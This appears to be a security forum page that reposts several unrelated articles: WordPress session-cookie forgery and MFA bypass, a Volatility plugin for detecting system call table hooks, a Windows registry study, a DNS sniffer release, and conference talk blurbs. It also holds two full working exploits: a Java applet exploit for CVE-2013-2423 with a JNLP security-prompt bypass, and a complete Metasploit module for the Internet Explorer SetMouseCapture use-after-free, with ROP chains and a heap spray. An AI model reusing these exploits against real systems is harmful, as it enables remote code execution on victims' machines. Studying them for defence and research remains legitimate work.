Nytro

[h=3]Jamming With WordPress Sessions[/h] Let’s talk about some targeted attacks where session management can be targeted to side step multi factor authentication. I’ll be focusing on WordPress, a popular website content management system, that also just happens to handle “sessions” in a unique way which makes this a far more interesting discussion. At the time of writing, the current release: WordPress 3.5.1 uses the described method to verify logged in status for accounts. Here’s an example WordPress "session", or authentication cookie: Cookie name: wordpress_81aa6832caa89375bfc354face5f674e Path: /wp-admin Value: admin|1364335563|8b03a400e8e416c4eba7a63f6fd616d1 Once you have the equivalent cookie for a WordPress site (which for most WordPress sites is sent over HTTP, allowing it to be sniffed over an insecure wireless network at a coffee shop or conference) you would be able to go to the site’s admin panel and already be logged in able do whatever you want as that user. Oh, and that snazzy multi factor authentication plugin you’re using? It does nothing! Once you have a valid authentication cookie, WordPress will let you access the site as an authenticated user, without needing to go through the multi-factor authentication process. While I consider it pretty cool to side-step the MFA or authentication steps, I dug a little more in to how WordPress manages these “sessions” and found out a bit more interesting facts. So, let’s get back to the authentication cookie, the first thing we want to do is track down is the name of the cookie, since it’s pretty strange. This turns out to be pretty straightforward; the cookie names are set in wp-includes/default-constants.php. It’s a constant that is set in the code and uses nothing at all, or the md5 of the value of $siteurl, which is the site’s domain name, and inadvertently not hard to generate yourself. Next let’s look over the value. Value: admin|1364335563|8b03a400e8e416c4eba7a63f6fd616d1 This is apparently three values separated by |'s. The "admin" username is obvious, and so is that Unix timestamp. That last value 8b03a400e8e416c4eba7a63f6fd616d1 looks like the magic value that makes the whole system work. So let’s see how it is set and how it is used. Most of the action is in wp-includes/pluggable.php and I’ll start off with a snippet from wp_generate_auth_cookie() that handles setting the cookie’s value. Here you can see how $cookie is set, we can confirm the assumptions of the username, that timestamp is now evidently the session's expiration date, and now we see that the magic value is an md5 HMAC of user login and expiration time as a string, using a secret $key value that was generated by wp_hash(). So, let's look into that wp_hash() Here wp_hash() returns a hash using hash_hmac() as well, but it makes sure to use a salt generated by wp_salt() (it gets a little complicated in the code (but it is all still in pluggable.php) but wp_salt() basically returns the site’s secret salt values.) They provided the wp_hash() function the user login, only 4 characters of the user’s password hash, and the expiration date for the “session”. wp_hash() returns the string from hash_hmac(), but also uses the website’s secret salt values to ensure a confidential string is generated. These salt values are key, as without them it would be trivial to generate your own authentication token. Now we know how WordPress sites generate a session cookie. Let’s look into how they verify a session is valid, as that is where it gets surprising. Instead of storing session information in a session table stored on the server, they perform the same calculations on the cookie provided by the visitor to verify if it is valid. The site accepts the browser’s cookie values, then using the provided username + timestamp it calculates the token value using it’s secret salts and sees if the generated token matches the supplied token value. We can look up the wp_validate_auth_cookie() function in pluggable.php to see for yourself. Spoiler alert: it looks basically the same as the cookie generation function but with comparisons. You can see $hash is generated in the same way (re-using the same code, and using values form the cookie provided by the browser) and then compared against $hmac (which was pulled earlier from the cookie values) – if they do not match you get some “auth_cookie_bad_hash” action, if they do match you’ll get “auth_cookie_valid”. The entire session management in WordPress hinges on 2 secret values: The site’s salts, and only 4 characters of the user’s password hash. While this should prevent against brute force attacks, there are still multiple ways this method of authentication/session management can be a abused by an attacker: Lack of session management on the server Ability to create sessions without evidence left on the site This functionality has been in WordPress for a long time (since 2.x versions) and I’m not the first to talk about it. Independent researchers have discussed it and there is a formal CVE regarding the concern of session hijacking with Wordpress sites. Just about a year ago, an independent researcher Gennady Kovshenin (@soulseekah) wrote their findings about it in great detail Why WordPress Authentication Unique Keys and Salts Are Important CVE-2012-5868 Session Replay attacks against WordPress (Reported December 2012) At the time of writing this post, WordPress has yet to addressed this concern. I have discussed it with their security team, and while their response was respectful they informed me they have no immediate plans to enact a fix. In the meantime they recommend using HTTPS for your WordPress login page. (That is, presuming you have HTTPS setup on your WordPress site.) Let us discuss those attacks: I will skip going over session hijacking or replay attacks in depth (these have been covered elsewhere plenty of times.) To summarize: If you log in to a WordPress powered website using an insecure connection, someone else on the network could sniff the cookies sent to your browser. They could then use the captured cookies to access the site. Programs like Firesheep have popularized this type of attack. The lack of session management on the server and the ability to generate valid authentication cookies provides a unique scenario for attackers. They can generate “irrevocable” and undetectable valid session cookies. I say “irrevocable” because there are no documented ways to revoke your site’s authentication cookies. Knowing the code above, you may be able to see how: In order to invalidate a WordPress authentication cookie you have only two options. Change the user’s password, or update the site’s secret salts. Unfortunately, there are no easy ways to generate new secret salts in WordPress core. How about a hypothetical scenario to make this a little more interesting though? In this scenario we will say an attacker was able to gain access to, or guess the site’s secret salt values. They would then be able to generate their own valid login cookies that expire at arbitrary times. There would be no evidence that the sessions had been generated and no way the site owner would know these valid authentication cookies were created. Here is a working proof of concept that will iterate through the site’s users and generate valid authentication cookies for each user, and that expire in 2113. Of course, this is purely the hypothetical scenario where the attacker may have access to your site’s secrets. However, this is true in a post-compromise scenario. If the attackers were able to break into your site, they could leave it untouched and just generate authentication cookies to allow them access to your site later (even after you’ve patched the vulnerability that allowed them access.) This is why any reputable article related to a hacked WordPress site will always inform you to change your site’s secret salts and passwords after a compromise. This step is required to invalidate any session cookies attackers may have created for themselves. To summarize: Even with Multi-Factor Authentication, the authentication step can be bypassed if session ID cookies are not protected. Storing session information on the server will allow you to monitor and disable sessions. This is extremely important in the event of a breach. I hope this post was informative and has made you more aware of the special bond between session management and authentication. Posted by Robert Rowley on 02 April 2013 at 11:13 Sursa: Jamming With WordPress Sessions - SpiderLabs Anterior

[h=3]Auditing the System Call Table[/h]When malicious, kernel-level code is installed on the system, one action it may take is to hook various system services. What this means is that it takes some standard piece of operating system functionality and replaces it with its own code, allowing it to alter the way all other programs use the OS. For example, it may hook functions involved in opening registry keys, and modify their output so as to hide registry keys the rootkit uses. As system calls are the primary interface between user and kernel mode, the system call table is a popular place to do such hooking. It's worth noting that many security products also make heavy use of hooking. One common example is antivirus software; among the many functions it hooks is NtCreateProcess (used, as the name suggests, to start a new process) so that it can do its on-demand scanning of any newly launched programs. For this reason, it's not safe to assume that any hooking of system calls is malicious; in fact, some of the most suspicious-looking things initially often turn out to be security software. Still, it may be quite useful to be able to examine the system call table of a memory image during an investigation, in order to detect any hooks that shouldn't be there. To do this, we'll first look at how system calls work in Windows and lay out the data structures that are involved. I'll then describe a Volatility plugin that examines each entry in the system call table, gives its symbolic name, and then tells what kernel module owns the function it points to. If you want to skip the learning experience and get straight to the plugin, you can download it here and place it in your memory_plugins directory. You'll also need to get my library for list walking and place it in "forensics/win32". If you look at any of the native API functions, like ZwCreateFile, you'll notice that they all look almost identical: lkd> u nt!ZwCreateFile nt!ZwCreateFile: 804fd724 b825000000 mov eax,25h 804fd729 8d542404 lea edx,[esp+4] 804fd72d 9c pushfd 804fd72e 6a08 push 8 804fd730 e83cf10300 call nt!KiSystemService (8053c871) 804fd735 c22c00 ret 2Ch We see that the function just places the value 0x25 into eax, points edx at the stack, and calls nt!KiSystemService. It turns out that this value, 0x25, is the system call number that corresponds to the CreateFile function. Without going into too much detail about how KiSystemService works, the function essentially takes the value in the eax register, and then looks up that entry in a global system call table. The table contains function pointers to the actual kernel-land functions that implement that system call. But, of course, the situation isn't quite as simple as that. In fact, Windows is designed to allow third party developers to add their own system calls. To support this, each _KTHREAD contains a member named ServiceTable which is a pointer to a data structure that looks like this: typedef struct _SERVICE_DESCRIPTOR_TABLE { SERVICE_DESCRIPTOR_ENTRY Descriptors[4]; } SERVICE_DESCRIPTOR_TABLE; typedef struct _SERVICE_DESCRIPTOR_ENTRY { PVOID KiServiceTable; PULONG CounterBaseTable; LONG ServiceLimit; PUCHAR ArgumentTable; } SERVICE_DESCRIPTOR_ENTRY; As you can see, we can actually have up to four separate system service tables per thread! In practice, however, we only see the first two entries in this array filled in: the first one points to nt!KiServiceTable, which contains the functions that deal with standard OS functionality, and the second points to win32k!W32pServiceTable, which contains the functions for the GDI subsystem (managing windows, basic graphics functions, and so on). For system call numbers up to 0x1000, the first table is used, while for the range 0x1000-0x2000 the second table is consulted (this may generalize for 0x2000-0x3000 and 0x3000-0x4000, but I haven't tested it). To take a look at the contents of these two tables, we can use the dps command in WinDbg, which takes a memory address and then attempts to look up the symbolic name of each DWORD starting at that address. To examine the full table, you should pass dps the number of DWORDS you want to examine -- the exact number will be the value found in the ServiceLimit member for the table you're interested in. For example: lkd> dps nt!KiServiceTable L11c 805011fc 80598746 nt!NtAcceptConnectPort 80501200 805e5914 nt!NtAccessCheck 80501204 805e915a nt!NtAccessCheckAndAuditAlarm 80501208 805e5946 nt!NtAccessCheckByType [...] 8050128c 8060be48 nt!NtCreateEventPair 80501290 8056d3ca nt!NtCreateFile 80501294 8056bc5c nt!NtCreateIoCompletion [...] Note that NtCreateFile is the 0x25th entry in the table, as we expected. On a system with no hooks installed, all functions in nt!KiServiceTable will point into the kernel (ntoskrnl.exe), and all functions in win32k!W32pServiceTable will be be inside win32k.sys. If they don't, it means the function has been hooked. The plugin for Volatility, then, works as follows. First, we go over each thread in each process, and gather up all distinct pointers to service tables. We examine all of them in case one thread has had its ServiceTable changed while the others remain untouched. Then we display each entry in each (unique) table, along with the name it usually has (in an unhooked installation), and what driver the function belongs to. Here's some sample output: $ python volatility ssdt -f xp-laptop-2005-07-04-1430.img Gathering all referenced SSDTs from KTHREADs... Finding appropriate address space for tables... SSDT[0] at 804e26a8 with 284 entries Entry 0x0000: 0x805862de (NtAcceptConnectPort) owned by ntoskrnl.exe Entry 0x0001: 0x8056fded (NtAccessCheck) owned by ntoskrnl.exe Entry 0x0002: 0x8058945b (NtAccessCheckAndAuditAlarm) owned by ntoskrnl.exe [...] Entry 0x0035: 0xf87436f0 (NtCreateThread) owned by wpsdrvnt.sys [...] SSDT[1] at bf997780 with 667 entries Entry 0x1000: 0xbf93517d (NtGdiAbortDoc) owned by win32k.sys Entry 0x1001: 0xbf946c1f (NtGdiAbortPath) owned by win32k.sys [...] Here we can see that the NtCreateThread function has been hooked by wpsdrvnt.sys. A little Googling shows that this driver is a part of Sygate Personal Firewall -- as mentioned before, security products are the most common non-malicious software that hooks kernel functions. In closing, I should mention one caveat to using this tool: at the moment, the names of the system calls are hardcoded with the values derived from WinDbg on Windows XP SP2. As demonstrated by the Metasploit System Call Table page, the order and number of entries in the system call table change between different versions of Windows, so make sure that you only analyze SP2 images with this plugin! As always, patches are welcome if you want to adapt this to deal with other versions of Windows. Now go forth, and catch those rootkits! Sursa: Push the Red Button: Auditing the System Call Table

[h=1]The Internal Structure of the Windows Registry[/h] [h=2]Peter Norris BSc (Hons), MBCS February 2009[/h] [TABLE=width: 90%, align: center] [TR] [TD=width: 5%] [/TD] [TD=align: center]This web page contains the full report of this MSc project complete with the source code to all the programs and utilities that were produced. It is reproduced and made available here in support of the Computer Forensic community in particular and of knowledge in general. This material is copyright Cranfield University.[/TD] [TD=width: 5%] [/TD] [/TR] [TR] [TD=colspan: 3] [/TD] [/TR] [TR] [TD=width: 5%] [/TD] [TD=align: center]As from 16th August 2012 these files are on Google Docs[/TD] [TD=width: 5%] [/TD] [/TR] [/TABLE] [TABLE=align: center] [TR] [TD]Complete Project CD (iso)[/TD] [TD] [/TD] [TD=align: right]113,102 KB[/TD] [TD] [/TD] [TD]413a2d2bac78a94c720333ef95b62f89[/TD] [/TR] [TR] [TD] [/TD] [TD] [/TD] [TD] [/TD] [TD] [/TD] [TD] [/TD] [/TR] [TR] [TD]Registry Structure - Main (pdf)[/TD] [TD] [/TD] [TD=align: right]580 KB[/TD] [TD] [/TD] [TD]02c18554d79b3359b7b49df4e8f0db1d[/TD] [/TR] [TR] [TD]Registry Structure - Appendices (pdf)[/TD] [TD] [/TD] [TD=align: right]2,740 KB[/TD] [TD] [/TD] [TD]34a715b99c9bc1e37b5d02509a783997[/TD] [/TR] [TR] [TD]Registry Structure - Supplements (pdf)[/TD] [TD] [/TD] [TD=align: right]20,535 KB[/TD] [TD] [/TD] [TD]030152b15d7ba940ac079fb47b07e32c[/TD] [/TR] [TR] [TD] [/TD] [TD] [/TD] [TD] [/TD] [TD] [/TD] [TD] [/TD] [/TR] [TR] [TD]Programs (zip)[/TD] [TD] [/TD] [TD=align: right]273 KB[/TD] [TD] [/TD] [TD]ef063348b863c85feb30fecd4080c62f[/TD] [/TR] [TR] [TD]Source Code (zip)[/TD] [TD] [/TD] [TD=align: right]3,859 KB[/TD] [TD] [/TD] [TD]82e9afb62316bcb13a94b9108b9626ff[/TD] [/TR] [/TABLE] [TABLE=width: 90%, align: center] [TR] [TD=width: 5%] [/TD] [TD=align: center]I am more than happy to answer questions about this project or enter into discussions or debates about this subject. I can be contacted by email at 'registry at suzibandit dot co dot uk'. Peter Norris May 2009[/TD] [/TR] [/TABLE] Sursa: Registry Structure

[h=2]DNS Sniffer utility[/h] DNSQuerySniffer is a new network sniffer utility that shows the DNS queries sent on your system. For every DNS query, the following information is displayed: Host Name, Port Number, Query ID, Request Type (A, AAAA, NS, MX, and so on), Request Time, Response Time, Duration, Response Code, Number of records, and the content of the returned DNS records. You can easily export the DNS queries information to csv/tab-delimited/xml/html file, or copy the DNS queries to the clipboard, and then paste them into Excel or other spreadsheet application. DNSQuerySniffer works on any version of Windows, starting from Windows 2000, and up to Windows 8. Both 32-bit and 64-bit systems are supported. DNSQuerySniffer You can download this new utility from this Web page. Sursa: New DNS Sniffer utility

The Latest Java Exploit with Security Prompt/Warning Bypass (CVE-2013-2423) From Java SE 7 update 11 oracle has introduced a new security features called security warning that prompts a window every time an applet request for execution. For example, if we want to execute latest Java SE 7 update 17 exploit we get this warning. Yesterday Immunity has published a blog post explaining a new vulnerability they have found into the java validating mechanism which allow to execute an untrusted applet without showing the warning. For in-dept details read their blog post here. Briefly, to bypass the above prompt you must call the applet with the parameter __applet_ssv_validated set to true. The only way to manipulate this parameter is to use a java Network Launch Protocol file. Regarding to oracle there are two ways to use JNLP in a page: With the applet tag With javascript only Let's try first the example with the tag applet. The code we're going to run is the latest publicly available java exploit CVE-2013-2423. import java.applet.Applet;import java.lang.invoke.MethodHandle; import java.lang.reflect.Field; import static java.lang.invoke.MethodHandles.lookup; public class Code extends Applet { public void init() { try { disableSecurityManager(); Runtime.getRuntime().exec("calc.exe"); } catch( Throwable e ){} } class Union1 { int field1; Object field2; } class Union2 { int field1; SystemClass field2; } class SystemClass { Object f1,f2,f3,f4,f5,f6,f7,f8,f9,f10,f11,f12, f13,f14,f15,f16,f17,f18,f19,f20,f21,f22,f23, f24,f25,f26,f27,f28,f29,f30; } private void disableSecurityManager() throws Throwable { MethodHandle mh1, mh2; mh1 = lookup().findStaticSetter(Double.class, "TYPE", Class.class); mh2 = lookup().findStaticSetter(Integer.class, "TYPE", Class.class); Field fld1 = Union1.class.getDeclaredField("field1"); Field fld2 = Union2.class.getDeclaredField("field1"); Class classInt = int.class; Class classDouble = double.class; mh1.invokeExact(int.class); mh2.invokeExact((Class)null); Union1 u1 = new Union1(); u1.field2 = System.class; Union2 u2 = new Union2(); fld2.set(u2, fld1.get(u1)); mh1.invokeExact(classDouble); mh2.invokeExact(classInt); if (u2.field2.f29 == System.getSecurityManager()) { u2.field2.f29 = null; } else if (u2.field2.f30 == System.getSecurityManager()) { u2.field2.f30 = null; } } } After created the jar in order to deploy an applet we have to create the JNPL and save it as applet.jnlp. <?xml version="1.0" encoding="utf-8"?> <jnlp href="applet.jnlp" spec="1.0" xmlns:jfx="http://javafx.com"> <information> <title>Applet Test JNLP</title> <vendor>test</vendor> </information> <resources> <j2se href="http://java.sun.com/products/autodl/j2se" version="1.7+" /> <jar href="cve-2013-2423.jar" main="true" /> </resources> <applet-desc height="1" main-class="Code" name="Applet Security Bypass" width="1"> <param name="__applet_ssv_validated" value="true" /> </applet-desc> </jnlp> Now we have to encode the content of applet.jnlp to a base64 string. To do this you could use an online tool like base64encode.org or the unix base64 command: ? [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]base64 applet.jnlp [/TD] [/TR] [/TABLE] As final thing create the page where the applet tag should reside. The value of parameter jnlp_embedded would be the base64 string of applet.jnlp. - See more at: Security Obscurity Blog: The Latest Java Exploit with Security Prompt/Warning Bypass (CVE-2013-2423) Now we have to encode the content of applet.jnlp to a base64 string. To do this you could use an online tool like base64encode.org or the unix base64 command: base64 applet.jnlp As final thing create the page where the applet tag should reside. The value of parameter jnlp_embedded would be the base64 string of applet.jnlp <html> <body> <h3>Java SE 7 u17 Exploit with Applet Prompt/Warning Bypass</h3> <applet> <param name="jnlp_href" value="applet.jnlp" /> <param name="jnlp_embedded" value="PD94bZX ... zYz4KPPg==" /> </applet> </body> </html> After saving all these files in the same directory we try to load the page with firefox to check if it works. It works perfectly, no security warning prompted. But if you try to see the page with chrome the applet will not be loaded. I think because chrome doesn't like jnlp files. The second option is to use JavaScript instead of the tag applet. The first step is to create the jnlp file as before, then encode it to base64. Which differs from the previous method is the last step, that will look like this: <html> <head> <title>CVE-2013-2423 Bypass Prompt</title> </head> <body> <h3>Java SE 7 u17 Exploit with Applet Prompt/Warning Bypass</h3> <script src="http://www.java.com/js/deployJava.js" ></script> <script> var attributes = { height: 1, width: 1}; var parameters = { jnlp_href: 'applet.jnlp', jnlp_embedded: 'PD94 ... Pg==' }; deployJava.runApplet(attributes, parameters, '1.7'); </script> </body> </html> Loading the page with chrome, firefox, ie and opera shows that it works. As usual here is the video. Enjoy. Reference: What should I do when I see a security prompt from Java? Yet Another java security warning bypass Embedding JNLP File in Applet Tag Sursa: Security Obscurity Blog: The Latest Java Exploit with Security Prompt/Warning Bypass (CVE-2013-2423)

Derbycon 2013 - Look Ma, No Exploits! – The Recon-Ng Framework - Tim “Lanmaster53? Tomes Description: Description: I’ve been on the conference circuit for the last year preaching the importance of thorough reconnaissance as a part of the penetration testing methodology. I’ve talked about the principles of reconnaissance, how to accomplish it quickly and effectively, and even released a few tools to help along the way. In my latest tool, the Recon-ng framework, the power of reconnaissance has been taken to a new level. In this talk, I am going to discuss and demonstrate the power of the Recon-ng framework by walking attendees through a live reconnaissance scenario which starts with the tester having nothing but the framework, and ends in the tester gaining credentials to the target environment. All without sending a single packet to the target network. Come a skeptic. Leave a believer. Reconnaissance is king. Bio: Tim Tomes is a Senior Security Consultant, Research Specialist, and Developer for Black Hills Information Security with over 20 years experience in information technology and application development. During a 9-year career as an Officer in the United States Army, Tim spent three years as the Army Red Team Senior Team Leader and was the principle developer and manager of the Army’s first Cyber Defense Training Program (255S). Tim manages multiple open source projects such as the Recon-ng framework, the HoneyBadger Geolocation framework, and PushPin, is a SANS Instructor for SEC542 Web Application Penetration Testing, writes technical articles for PaulDotCom, and frequently presents at Security Conferences such as ShmooCon, DerbyCon, Hack3rCon, and Regional ISSA Conferences. For More Information please visit : - Derbycon 2013 Videos (Hacking Illustrated Series InfoSec Tutorial Videos) Sursa: Derbycon 2013 - Look Ma, No Exploits! – The Recon-Ng Framework - Tim “Lanmaster53? Tomes

Derbycon 2013 - Practical Exploitation Using A Malicious Service Set Identifier (Ssid) - Deral Heiland Description: Description: How easily we overlook a simple wireless SSID and think nothing of it or its potential risk to us. In this presentation I will be discussing the leveraging of SSIDs to inject various attacks into Wireless devices, and management consoles. The type of injection attacks discussed will include XSS, CSRF, command injection and format strings attacks. I will be discussing various malicious SSID restrictions, limitations, and potential attack success dependencies. Using live demonstrations I will show how each of these attack methods are carried out. In Conclusion I will be discussing how common this attack vector potentially is, and its overall risk factors. Bio: Deral Heiland CISSP, serves as a Senior Security Engineer where he is responsible for security assessments, and consulting for corporations and government agencies. Deral is also founder of Ohio Information Security Forum a not for profit organization that focuses on information security training and education. Deral has also presented at numerous national and international security conferences including Blackhat, ShmooCon, Defcon, Securitybyte India, Hackcon Olso Norway and has also been a guest lecturer at the Airforce Institute of Technology (AFIT). Deral has been interviewed by and quoted by several media outlets and publications including Bloomberg UTV, MIT Technical Review, MSNBC and PCworld. For More Information please visit : - Derbycon 2013 Videos (Hacking Illustrated Series InfoSec Tutorial Videos) Sursa: Derbycon 2013 - Practical Exploitation Using A Malicious Service Set Identifier (Ssid) - Deral Heiland

Microsoft Internet Explorer SetMouseCapture Use-After-Free Authored by sinn3r, temp66 | Site metasploit.com This Metasploit module exploits a use-after-free vulnerability that targets Internet Explorer 9 on Windows 7. The flaw most likely exists in versions 6/7/8/9/10/11. It was initially found in the wild in Japan, but other regions such as English, Chinese, Korean, etc, were targeted as well. The vulnerability is due to how the mshtml!CDoc::SetMouseCapture function handles a reference during an event. An attacker first can setup two elements, where the second is the child of the first, and then setup a onlosecapture event handler for the parent element. The onlosecapture event seems to require two setCapture() calls to trigger, one for the parent element, one for the child. When the setCapture() call for the child element is called, it finally triggers the event, which allows the attacker to cause an arbitrary memory release using document.write(), which in particular frees up a 0x54-byte memory. The exact size of this memory may differ based on the version of IE. After the free, an invalid reference will still be kept and passed on to more functions, eventually arriving in function MSHTML!CTreeNode::GetInterface, and causing a crash (or arbitrary code execution) when this function attempts to use this reference to call what appears to be a PrivateQueryInterface due to the offset (0x00). To mimic the same exploit found in the wild, this module will try to use the same DLL from Microsoft Office 2007 or 2010 to leverage the attack. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML def initialize(info={}) super(update_info(info, 'Name' => "Micorosft Internet Explorer SetMouseCapture Use-After-Free", 'Description' => %q{ This module exploits a use-after-free vulnerability that currents targets Internet Explorer 9 on Windows 7, but the flaw should exist in versions 6/7/8/9/10/11. It was initially found in the wild in Japan, but other regions such as English, Chinese, Korean, etc, were targeted as well. The vulnerability is due to how the mshtml!CDoc::SetMouseCapture function handles a reference during an event. An attacker first can setup two elements, where the second is the child of the first, and then setup a onlosecapture event handler for the parent element. The onlosecapture event seems to require two setCapture() calls to trigger, one for the parent element, one for the child. When the setCapture() call for the child element is called, it finally triggers the event, which allows the attacker to cause an arbitrary memory release using document.write(), which in particular frees up a 0x54-byte memory. The exact size of this memory may differ based on the version of IE. After the free, an invalid reference will still be kept and pass on to more functions, eventuall this arrives in function MSHTML!CTreeNode::GetInterface, and causes a crash (or arbitrary code execution) when this function attempts to use this reference to call what appears to be a PrivateQueryInterface due to the offset (0x00). To mimic the same exploit found in the wild, this module will try to use the same DLL from Microsoft Office 2007 or 2010 to leverage the attack. }, 'License' => MSF_LICENSE, 'Author' => [ 'Unknown', # Exploit in the wild first spotted in Japan 'sinn3r' # Metasploit (thx binjo for the heads up!) ], 'References' => [ [ 'CVE', '2013-3893' ], [ 'OSVDB', '97380' ], [ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2887505' ], [ 'URL', 'http://blogs.technet.com/b/srd/archive/2013/09/17/cve-2013-3893-fix-it-workaround-available.aspx' ] ], 'Platform' => 'win', 'Targets' => [ [ 'Automatic', {} ], [ 'IE 9 on Windows 7 SP1 with Microsoft Office 2007 or 2010', {} ] ], 'Payload' => { 'BadChars' => "\x00", 'PrependEncoder' => "\x81\xc4\x80\xc7\xfe\xff" # add esp, -80000 }, 'DefaultOptions' => { 'PrependMigrate' => true, 'InitialAutoRunScript' => 'migrate -f' }, 'Privileged' => false, 'DisclosureDate' => "Sep 17 2013", 'DefaultTarget' => 0)) end def is_win7_ie9?(agent) (agent =~ /MSIE 9/ and agent =~ /Windows NT 6\.1/) end def get_preq_html(cli, req) %Q| <html> <script> function getDLL() { var checka = 0; var checkb = 0; try { checka = new ActiveXObject("SharePoint.OpenDocuments.4"); } catch (e) {} try { checkb = new ActiveXObject("SharePoint.OpenDocuments.3"); } catch (e) {} if ((typeof checka) == "object" && (typeof checkb) == "object") { return "office2010"; } else if ((typeof checka) == "number" && (typeof checkb) == "object") { return "office2007"; } return "na"; } window.onload = function() { document.location = "#{get_resource}/#{@exploit_page}?dll=" + getDLL(); } </script> </html> | end def junk return rand_text_alpha(4).unpack("V")[0].to_i end def get_payload(rop_dll) code = payload.encoded rop = '' p = '' case rop_dll when :office2007 rop = [ junk, # Alignment 0x51c46f91, # POP EBP # RETN [hxds.dll] 0x51c46f91, # skip 4 bytes [hxds.dll] 0x51c35a4d, # POP EBX # RETN [hxds.dll] 0xffffffff, 0x51bd90fd, # INC EBX # RETN [hxds.dll] 0x51bd90fd, # INC EBX # RETN [hxds.dll] 0x51bfa98e, # POP EDX # RETN [hxds.dll] 0xffffefff, 0x51c08b65, # XCHG EAX, EDX # RETN [hxds.dll] 0x51c1df88, # NEG EAX # RETN [hxds.dll] 0x51c55c45, # DEC EAX, RETN [hxds.dll] 0x51c08b65, # XCHG EAX, EDX # RETN [hxds.dll] 0x51c4c17c, # POP ECX # RETN [hxds.dll] 0xffffffc0, 0x51bfbaae, # XCHG EAX, ECX # RETN [hxds.dll] 0x51c1df88, # NEG EAX # RETN [hxds.dll] 0x51bfbaae, # XCHG EAX, ECX # RETN [hxds.dll] 0x51c05766, # POP EDI # RETN [hxds.dll] 0x51bfbaaf, # RETN (ROP NOP) [hxds.dll] 0x51c2e77d, # POP ESI # RETN [hxds.dll] 0x51bfc840, # JMP [EAX] [hxds.dll] 0x51c05266, # POP EAX # RETN [hxds.dll] 0x51bd115c, # ptr to &VirtualAlloc() [IAT hxds.dll] 0x51bdf91f, # PUSHAD # RETN [hxds.dll] 0x51c4a9f3, # ptr to 'jmp esp' [hxds.dll] ].pack("V*") when :office2010 rop = [ # 4 dword junks due to the add esp in stack pivot junk, junk, junk, junk, 0x51c41953, # POP EBP # RETN [hxds.dll] 0x51be3a03, # RETN (ROP NOP) [hxds.dll] 0x51c41953, # skip 4 bytes [hxds.dll] 0x51c4486d, # POP EBX # RETN [hxds.dll] 0xffffffff, 0x51c392d8, # EXCHG EAX, EBX # RETN [hxds.dll] 0x51bd1a77, # INC EAX # RETN [hxds.dll] 0x51bd1a77, # INC EAX # RETN [hxds.dll] 0x51c392d8, # EXCHG EAX, EBX # RETN [hxds.dll] 0x51bfa298, # POP EDX # RETN [hxds.dll] 0xffffefff, 0x51bea84d, # XCHG EAX, EDX # RETN [hxds.dll] 0x51bf5188, # NEG EAX # POP ESI # RETN [hxds.dll] junk, 0x51bd5382, # DEC EAX # RETN [hxds.dll] 0x51bea84d, # XCHG EAX, EDX # RETN [hxds.dll] 0x51c1f094, # POP ECX # RETN [hxds.dll] 0xffffffc0, 0x51be5986, # XCHG EAX, ECX # RETN [hxds.dll] 0x51bf5188, # NEG EAX # POP ESI # RETN [hxds.dll] junk, 0x51be5986, # XCHG EAX, ECX # RETN [hxds.dll] 0x51bf1ff0, # POP EDI # RETN [hxds.dll] 0x51bd5383, # RETN (ROP NOP) [hxds.dll] 0x51c07c8b, # POP ESI # RETN [hxds.dll] 0x51bfc7cb, # JMP [EAX] [hxds.dll] 0x51c44707, # POP EAX # RETN [hxds.dll] 0x51bd10bc, # ptr to &VirtualAlloc() [IAT hxds.dll] 0x51c3604e, # PUSHAD # RETN [hxds.dll] 0x51c541ef, # ptr to 'jmp esp' [hxds.dll] ].pack("V*") end p = rop + code p end def get_exploit_html(cli, req, rop_dll) gadgets = {} case rop_dll when :office2007 gadgets[:spray1] = 0x1af40020 # 0x31610020-0xc4, pointer to gadgets[:call_eax] gadgets[:target] = 0x3160ff5c # mov eax, [esi] # push esi # call [eax+4] gadgets[:call_eax] = 0x51bd1ce8 # xchg eax,esp # add byte [eax], al # pop esi # mov [edi+23c], ebp # mov [edi+238], ebp # mov [edi+234], ebp # pop ebp # pop ebx # ret gadgets[:pivot] = 0x51be4418 when :office2010 gadgets[:spray1] = 0x1a7f0020 # 0x30200020-0xc4, pointer to gadgets[:call_eax] gadgets[:target] = 0x301fff5c # mov eax, [esi] # push esi # call [eax+4] gadgets[:call_eax] = 0x51bd1a41 # xchg eax,esp # add eax,dword ptr [eax] # add esp,10 # mov eax,esi # pop esi # pop ebp # retn 4 gadgets[:pivot] = 0x51c00e64 end p1 = [ gadgets[:target], # Target address gadgets[:pivot] # stack pivot ].pack("V*") p1 << get_payload(rop_dll) p2 = [ gadgets[:call_eax] # MSHTML!CTreeNode::NodeAddRef+0x48 (call eax) ].pack("V*") js_s1 = Rex::Text::to_unescape([gadgets[:spray1]].pack("V*")) js_p1 = Rex::Text.to_unescape(p1) js_p2 = Rex::Text.to_unescape(p2) %Q| <html> <script> #{js_property_spray} function loadOffice() { try{location.href='ms-help://'} catch(e){} } var a = new Array(); function spray() { var obj = ''; for (i=0; i<20; i++) { if (i==0) { obj += unescape("#{js_s1}"); } else { obj += "\\u4242\\u4242"; } } obj += "\\u5555"; for (i=0; i<10; i++) { var e = document.createElement("div"); e.className = obj; a.push(e); } var s1 = unescape("#{js_p1}"); sprayHeap({shellcode:s1, maxAllocs:0x300}); var s2 = unescape("#{js_p2}"); sprayHeap({shellcode:s2, maxAllocs:0x300}); } function hit() { var id_0 = document.createElement("sup"); var id_1 = document.createElement("audio"); document.body.appendChild(id_0); document.body.appendChild(id_1); id_1.applyElement(id_0); id_0.onlosecapture=function(e) { document.write(""); spray(); } id_0['outerText']=""; id_0.setCapture(); id_1.setCapture(); } for (i=0; i<20; i++) { document.createElement("frame"); } window.onload = function() { loadOffice(); hit(); } </script> </html> | end def on_request_uri(cli, request) agent = request.headers['User-Agent'] unless is_win7_ie9?(agent) print_error("Not a suitable target: #{agent}") send_not_found(cli) end html = '' if request.uri =~ /\?dll=(\w+)$/ rop_dll = '' if $1 == 'office2007' print_status("Using Office 2007 ROP chain") rop_dll = :office2007 elsif $1 == 'office2010' print_status("Using Office 2010 ROP chain") rop_dll = :office2010 else print_error("Target does not have Office installed") send_not_found(cli) return end html = get_exploit_html(cli, request, rop_dll) else print_status("Checking target requirements...") html = get_preq_html(cli, request) end send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'}) end def exploit @exploit_page = "default.html" super end end =begin hxds.dll (Microsoft® Help Data Services Module) 